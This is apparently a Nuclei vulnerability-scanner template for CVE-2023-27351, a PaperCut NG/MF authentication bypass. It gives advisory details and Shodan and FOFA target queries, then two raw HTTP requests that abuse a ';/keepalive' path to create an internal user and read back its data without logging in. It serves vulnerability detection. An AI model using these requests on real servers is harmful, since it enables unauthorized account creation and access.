id: CVE-2023-27351

info:
  name: PaperCut NG - Authentication Bypass
  author: daffainfo,jjcho
  severity: high
  description: |
    This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SecurityRequestFilter class. The issue results from improper implementation of the authentication algorithm. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19226.
  impact: |
    Attackers can bypass authentication, gaining unauthorized access to the system and potentially executing malicious actions.
  remediation: |
    Update to the latest version of PaperCut NG that addresses this issue or apply the security patch provided by the vendor.
  reference:
    - https://www.papercut.com/kb/Main/PO-1216-and-PO-1219
    - https://www.zerodayinitiative.com/advisories/ZDI-23-232/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27351
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2023-27351
    epss-score: 0.83284
    epss-percentile: 0.99287
    cwe-id: CWE-287
    cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*,cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: papercut
    product: papercut_mf,papercut_ng
    shodan-query:
      - http.html:"PaperCut"
      - http.html:"papercut"
      - http.html:"content=\"papercut\""
      - cpe:"cpe:2.3:a:papercut:papercut_mf"
    fofa-query:
      - body="papercut"
      - body="content=\"papercut\""
  tags: cve2023,cve,papercut,auth-bypass,vkev,kev

flow: http(1) && http(2)

variables:
  username: "{{randbase(8)}}"
  password: "{{randstr}}"

http:
  - raw:
      - |
        POST /rpc/api/rest/master/user/createInternalUser;/keepalive HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":["{{username}}"],"password":["{{password}}"]}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'rO0A')"
          - "contains(content_type, 'application/json')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /rpc/api/rest/master/user/getExportedUser;/keepalive HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":["{{username}}"]}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'java.lang.String', 'HASH:', '{{username}}')"
          - "contains(content_type, 'application/json')"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502204f0c84b8283e9edd399b62dd892a79350aea8f7397942124606d847c028cdac20221008e660153aa40a4e4ef48169b271e5be44de4b9e95d938520b675cd8bfe4ae51b:922c64590222798bb761d5b6d8e72950